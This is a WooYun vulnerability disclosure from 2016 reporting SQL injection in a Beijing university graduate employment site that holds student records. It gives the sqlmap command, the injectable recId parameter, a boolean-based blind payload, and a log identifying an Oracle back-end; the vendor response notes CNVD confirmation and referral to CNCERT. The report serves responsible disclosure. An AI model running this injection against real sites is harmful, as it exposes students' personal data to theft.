当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170183

漏洞标题:北京高校毕业生就业信息网存在SQL注入(众多学生信息)

相关厂商:北京高校毕业生就业信息网

漏洞作者: 路人甲

提交时间:2016-01-17 12:30

修复时间:2016-03-04 13:27

公开时间:2016-03-04 13:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-04: 细节向公众公开

简要描述:

北京高校毕业生就业信息网存在SQL注入

详细说明:

注入点:
python sqlmap.py -u "http://**.**.**.**/campus
/job/view_rec?recId=fb3ccd02f16a49f383249ec4a9060ed9"
sqlmap截图:

1.png


可能导致众多学生信息泄露

漏洞证明:

sqlmap全过程:

[16:08:27] [INFO] testing connection to the target URL
[16:08:27] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[16:08:29] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
 or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[16:08:50] [INFO] searching for dynamic content
[16:08:50] [INFO] dynamic content marked for removal (15 regions)
[16:08:50] [CRITICAL] target URL is heavily dynamic. sqlmap is going to retry th
e request
[16:08:50] [INFO] searching for dynamic content
[16:08:50] [INFO] dynamic content marked for removal (15 regions)
[16:08:51] [CRITICAL] target URL is heavily dynamic. sqlmap is going to retry th
e request
[16:08:51] [INFO] searching for dynamic content
[16:08:51] [INFO] dynamic content marked for removal (15 regions)
[16:08:52] [CRITICAL] target URL is heavily dynamic. sqlmap is going to retry th
e request
[16:08:52] [INFO] searching for dynamic content
[16:08:52] [INFO] dynamic content marked for removal (15 regions)
[16:08:53] [WARNING] target URL is too dynamic. Switching to '--text-only'
[16:08:53] [INFO] testing if GET parameter 'recId' is dynamic
[16:08:53] [INFO] confirming that GET parameter 'recId' is dynamic
[16:08:53] [INFO] GET parameter 'recId' is dynamic
[16:08:53] [WARNING] heuristic (basic) test shows that GET parameter 'recId' mig
ht not be injectable
[16:08:54] [INFO] testing for SQL injection on GET parameter 'recId'
[16:08:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:08:57] [INFO] GET parameter 'recId' seems to be 'AND boolean-based blind - W
HERE or HAVING clause' injectable
[16:08:57] [WARNING] reflective value(s) found and filtering out
[16:08:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[16:08:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:08:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[16:09:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[16:09:00] [INFO] testing 'MySQL inline queries'
[16:09:00] [INFO] testing 'PostgreSQL inline queries'
[16:09:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:09:00] [INFO] testing 'Oracle inline queries'
[16:09:00] [INFO] testing 'SQLite inline queries'
[16:09:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:09:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[16:09:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:09:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:09:01] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:09:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:09:01] [INFO] testing 'Oracle AND time-based blind'
[16:09:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:09:02] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[16:09:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:09:08] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[16:09:14] [INFO] checking if the injection point on GET parameter 'recId' is a
false positive
GET parameter 'recId' is vulnerable. Do you want to keep testing the others (if
any)? [y/N]
sqlmap identified the following injection points with a total of 77 HTTP(s) requ
ests:
---
Parameter: recId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: recId=fb3ccd02f16a49f383249ec4a9060ed9' AND 7355=7355 AND 'xmse'='x
mse
---
[16:09:17] [INFO] testing MySQL
[16:09:18] [WARNING] the back-end DBMS is not MySQL
[16:09:18] [INFO] testing Oracle
[16:09:18] [INFO] confirming Oracle
[16:09:18] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-20 15:03

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置.

最新状态:

暂无